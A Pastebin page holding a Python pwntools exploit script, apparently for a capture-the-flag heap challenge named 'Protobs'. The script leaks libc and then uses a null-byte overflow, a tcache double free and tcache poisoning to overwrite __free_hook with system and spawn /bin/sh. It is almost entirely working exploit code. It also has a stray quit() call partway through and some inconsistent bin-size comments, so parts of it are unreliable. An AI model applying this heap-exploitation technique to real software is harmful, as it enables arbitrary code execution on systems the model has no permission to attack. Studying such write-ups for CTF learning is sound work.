Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- context.log_level = 'DEBUG'
- debug=True
- p = process('./Protobs')
- #libc = ELF('./libc.so.6')
- libc = ELF('./libc.so.6')
- #gdb.attach(p,'heap-analysis')
- def create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):
- p.sendlineafter('~$ ', str(2))
- p.sendlineafter(' [ Game ]: ',str(game))
- p.sendlineafter('[ Contrast ]: ', str(contrast))
- p.sendlineafter('[ Gamma ]: ', str(gamma))
- p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))
- p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))
- p.sendlineafter('[ Controller ]: ', str(controller))
- p.sendlineafter('[ Size of Description ]: ', str(size_description))
- def create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):
- p.sendlineafter('~$ ', str(2))
- p.sendlineafter(' [ Game ]: ',str(game))
- p.sendlineafter('[ Contrast ]: ', str(contrast))
- p.sendlineafter('[ Gamma ]: ', str(gamma))
- p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))
- p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))
- p.sendlineafter('[ Controller ]: ', str(controller))
- p.sendlineafter('[ Size of Description ]: ', str(size_description))
- p.sendlineafter('[ Description ]: ',str(description))
- def list_():
- p.sendlineafter('protobs@player2:~$ ', str(1))
- ret = p.recvuntil('protobs')
- log.info("list of configuration : " + ret)
- def read(idx,description):
- p.sendlineafter('protobs@player2:~$ ', str(3))
- p.sendlineafter('[ Config Index ]: ',str(idx))
- ret = p.recvuntil('protobs')
- return ret[:-1]
- def delete(idx):
- p.sendlineafter('~$ ', str(4))
- p.sendlineafter('[ Config Index ]: ', str(idx))
- description= "A" * 0x60
- size=0x450
- create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
- description= "B" * 511
- create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
- description= "C" * 511
- create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
- delete(1) ## To Not free the head or tail of the heap but the MIDDLE
- create_without_desc("hello",0,0,0,0,0,0)
- list_()
- p.sendlineafter('@player2:~$ ', str(3))
- p.sendlineafter('[ Config Index ]: ',str(1))
- p.recvuntil('[ Description ]: ')
- #gef p system
- #Cannot access memory at address 0x7fb53ec9ffd0
- #gef print __libc_start_main
- #Cannot access memory at address 0x7fb53ec73a80
- #gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80
- libc_offset=0x001e4ca0
- system_offset=0x0052fd0
- free_hook = libc.symbols['__free_hook']
- libc_leak = u64(p.recv(6).ljust(8, '\x00'))
- libc_base = libc_leak - libc_offset
- system=libc_base + system_offset
- log.info("Leak: 0x{:x}".format(libc_leak))
- log.info("Libc: 0x{:x}".format(libc_base))
- log.info("system: 0x{:x}".format(system))
- log.info('__free_hook: ' + hex(free_hook))
- list_()
- ### SECOND PART
- # Add a 0x50 and 0x180 chunk
- description = "A" * 0x180
- size = 0x180
- create_desc("hello",0,0,0,0,0,size,description)
- description = "A" * 0x180
- size = 0x180
- create_desc("hello",0,0,0,0,0,size,description)
- delete(3)
- description = "A" * 0x100
- size = 0x100
- create_desc("hello",0,0,0,0,0,size,description)
- delete(3) # delte config
- # Add a 0x50 and 0x180 chunk
- description = "A" * 0x58
- size = 0x58
- create_desc("hello",0,0,0,0,0,size,description)
- description = "B"*0x180
- size = 0x180
- create_desc("hello",0,0,0,0,0,size,description)
- quit()
- # Free them both
- delete(3) #0 # Goes into 0x50 tcache bin
- delete(4) #1 # Goes into 0x180 tcache bin
- # Get back the 0x50 chunk, but also null byte overflow into the 0x180 chunk
- # Also put in /bin/sh\x00 into it for later use
- size=0x58
- description='/bin/sh\x00' + 'A'*0x50
- create_desc("hello",0,0,0,0,0,size,description) # chunk A
- # The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)
- # This means we can free it again immediately
- delete(5) #1 # Goes into 0xf0 tcache bin
- # Get back the 0x100 chunk out of the 0x180 tcache bin
- size=0x180
- description='C'*0x180
- create_desc("hello",0,0,0,0,0,size,description) # chunk B
- # Since tcache_get will null out the key, we can free it immediately
- delete(7) #3 # Goes into 0xf0 tcache bin
- # Now: tcache[0x100] -> Chunk B <- Chunk B
- # We do the usual tcache poisoning attack
- # Get Chunk B from 0xf0 tcache bin and change it's FD to __free_hook
- size=0xf0
- description=p64(free_hook) + 'D'*0xe8
- create_desc("hello",0,0,0,0,0,size,description)
- size=0xf0
- description='E'*0xf0
- # Allocates chunk B again
- create_desc("hello",0,0,0,0,0,size,description)
- size=0xf0
- description=p64(system) + 'F'*0xe8
- # Allocates chunk on __free_hook, change it to system
- create_desc("hello",0,0,0,0,0,size,description)
- # Call free on the chunk with /bin/sh\x00 in it
- # This will then call free('/bin/sh\x00') which calls system('/bin/sh\x00')
- delete(4) #0
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement